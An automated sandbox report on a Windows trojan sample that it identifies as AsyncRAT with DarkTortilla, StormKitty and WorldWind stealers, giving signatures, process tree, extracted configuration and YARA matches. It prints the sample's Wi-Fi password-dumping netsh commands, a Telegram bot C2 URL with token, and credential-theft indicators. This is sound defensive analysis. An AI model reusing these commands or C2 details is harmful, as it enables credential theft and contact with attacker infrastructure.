Edit tour

Windows Analysis Report
Kh7W85ONS7.exe

Overview

General Information

Sample name:	Kh7W85ONS7.exe renamed because original name is a hash value
Original sample name:	395c4070233d059b2f1661fbdc6af0b4.exe
Analysis ID:	1465084
MD5:	395c4070233d059b2f1661fbdc6af0b4
SHA1:	c4e8741e9c21d4a5d9a45138232da82c751cc390
SHA256:	09dcf54c74a3669c9cd811df04f84601c723a7e7457b414e15a842192b8df669
Tags:	32exetrojan
Infos:

Detection

AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected DarkTortilla Crypter

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected WorldWind Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates memory in foreign processes

Connects to a pastebin service (likely for C&C)

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Kh7W85ONS7.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\Kh7W85ONS7.exe" MD5: 395C4070233D059B2F1661FBDC6AF0B4)

MSBuild.exe (PID: 8040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cmd.exe (PID: 1036 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3344 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 3232 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 1736 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4040 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2160 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 2216 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage"}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "J7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3cqiXYo1yZ5y3dDnnERLagBuX1bemwzX/7DjHkfOaIPLgAAO8vGHbQX3pPqmwC88sG1+FExp3FEKMITnQTqQr5uXa5GjggFUSFr9rt2nfcjEjHRnOzX1jpsUUtuDyqoAFhdosdv46x+o5Iod34II88nouxzyzAfMSa48ozukJ3fCknI6u9fj/it1dx0GimhXUv4YG4A19n3EdvJbaxZXImHZvqiYGsHTIUtxa89QhxCpuJPKdTP7ya5rJFkDT0Z8ijH4Z1Dv42umyEN6PT99JRuJHcXSqkXfOeOilnM6YRY019FHq6udNVWn5OQetK4ULVcQmwPTV26ZRPyrqO57Rjr5LeSauZtNKTE/kmS1iR3eMtq5PsAHunrHZPzzaUhY=", "Group": "Default"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x29432:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x259b3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.2128978665.0000000005D00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2127288804.0000000003CEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x31d64:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25463:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x54a14:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xd64b2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x50f95:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0xd2a33:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.2120819083.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: Kh7W85ONS7.exe PID: 7368	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Kh7W85ONS7.exe PID: 7368	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: Kh7W85ONS7.exe PID: 7368	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: Kh7W85ONS7.exe PID: 7368	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Kh7W85ONS7.exe PID: 7368	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Kh7W85ONS7.exe PID: 7368	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Kh7W85ONS7.exe PID: 7368	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x23c99:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x54f71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: Kh7W85ONS7.exe PID: 7368	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x227b7:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x53a8f:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: MSBuild.exe PID: 8040	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 8040	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: MSBuild.exe PID: 8040	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 8040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 8040	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 8040	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x6ac54:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: MSBuild.exe PID: 8040	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x10648:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x69772:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Kh7W85ONS7.exe.3cee410.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Kh7W85ONS7.exe.5d00000.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Kh7W85ONS7.exe.5d00000.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Kh7W85ONS7.exe.3cee410.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
6.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.MSBuild.exe.400000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
6.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.MSBuild.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.MSBuild.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
6.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
6.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
6.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.MSBuild.exe.400000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Kh7W85ONS7.exe.3bf4932.1.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Kh7W85ONS7.exe.3c763d0.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
